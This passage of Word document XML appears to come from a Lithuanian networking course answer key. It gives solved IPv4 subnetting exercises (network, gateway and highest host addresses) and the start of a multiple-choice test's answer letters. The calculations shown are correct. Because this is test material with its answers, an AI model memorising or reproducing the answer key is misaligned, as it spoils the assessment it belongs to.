          <w:p w14:paraId="2987BF1A" w14:textId="5DE251EC" w:rsidR="00332B40" w:rsidRPr="005A5C28" w:rsidRDefault="00332B40" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kokį tinklo adresą priskiriate kompiuteriui PC-A?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="57BB04B0" w14:textId="77777777" w:rsidR="00332B40" w:rsidRPr="005A5C28" w:rsidRDefault="00332B40" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>10.0.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="165A5C8C" w14:textId="77777777" w:rsidTr="00332B40">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AE3FA61" w14:textId="5FB6FF6B" w:rsidR="00332B40" w:rsidRPr="005A5C28" w:rsidRDefault="00332B40" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kokį tinklo adresą priskiriate kompiuteriui PC-B?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="57092EEF" w14:textId="77777777" w:rsidR="00332B40" w:rsidRPr="005A5C28" w:rsidRDefault="00332B40" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>10.0.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="502EB3C5" w14:textId="77777777" w:rsidTr="00332B40">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="239D128B" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Ar abu kompiuteriai yra tame pačiame tinkle ir gali vienas su kitu komunikuoti tiesiogiai? Kodėl?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5BDD345D" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Taip, nes tinklo IP adresas visiškai sutampa. Abu kompiuteriai yra tame pačiame tinkle. Galimi 131072 unikalūs IP adresai. Tinklo kaukė 15 bitų.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025204D" w:rsidRPr="005A5C28" w14:paraId="080D505B" w14:textId="77777777" w:rsidTr="00332B40">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AB35A32" w14:textId="3D1AB67C" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Koks </w:t>
            </w:r>
            <w:r w:rsidR="00332B40" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">didžiausias </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>IP adresas gali būti suteiktas PC-B, kad jis būtų tame pačiame tinkle kaip ir PC-A?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3D97EA89" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>10.1.255.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01D06A96" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E4EB1A" w14:textId="77777777" w:rsidR="00C25BA0" w:rsidRPr="005A5C28" w:rsidRDefault="00C25BA0"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12 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPV4 ADRESŲ SKAIČIAVIMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505E463A" w14:textId="5B6DDFAC" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ATSAKYMAI</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4343B7" w14:textId="77777777" w:rsidR="002E626A" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Įmonėje tinklo administratorius laikosi taisyklės, kad Default Gateway IP adresas yra visada pirmas naudojamoje LAN tinklo atestacijoje. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE1CD92" w14:textId="59CEBD5B" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Situacija: įrenginys turi IP adresą 172.16.140.24 ir tinklo kaukę 255.255.192.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B89739" w14:textId="299FADF8" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Koks šio tinklo IP adresas? </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="720" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9191"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4D5D9DC6" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10067" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="088E1238" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>172.16.128.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B7A8DF2" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Koks šio tinklo Default Gateway IP adresas? </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="720" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9191"/>
      </w:tblGrid>
      <w:tr w:rsidR="0025204D" w:rsidRPr="005A5C28" w14:paraId="056A89C2" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9347" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47A44EA9" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 172.16.128.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63337B37" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="569ABCF1" w14:textId="77777777" w:rsidR="002E626A" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Įmonėje tinklo administratorius laikosi taisyklės, kad Default Gateway IP adresas yra visada pirmas naudojamoje LAN tinklo atestacijoje. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F35AC05" w14:textId="0E89C6C2" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Situacija: įrenginys turi IP adresą 192.168.184.227 ir tinklo kaukę 255.255.255.248.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412BED6A" w14:textId="0A984903" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Koks šio tinklo IP adresas? </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="720" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9191"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="22E0406A" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10067" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D3FC7C9" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.184.224</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1013E68C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Koks šio tinklo Default Gateway IP adresas? </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="720" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9191"/>
      </w:tblGrid>
      <w:tr w:rsidR="0025204D" w:rsidRPr="005A5C28" w14:paraId="60300591" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9347" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="668039A3" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 192.168.184.225</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D528656" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A8CF5F" w14:textId="77777777" w:rsidR="00C25BA0" w:rsidRPr="005A5C28" w:rsidRDefault="00C25BA0"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13 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPV4 ADRESŲ SKAIČIAVIMAS. TESTAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619D30C2" w14:textId="77777777" w:rsidR="002E626A" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ATSAKYMAI</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372193F7" w14:textId="796B74D8" w:rsidR="002E626A" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200EA7F3" w14:textId="2A6E75C9" w:rsidR="002E626A" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> D</w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F881E57" w14:textId="0C8E13D0" w:rsidR="002E626A" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8A5D16" w14:textId="6AA96879" w:rsidR="002E626A" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3BC5AA" w14:textId="0019DC9A" w:rsidR="002E626A" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> D</w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D217576" w14:textId="212DDF05" w:rsidR="002E626A" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r w:rsidR="002E626A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BFFF5D" w14:textId="7B30AFF9" w:rsidR="002E626A" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
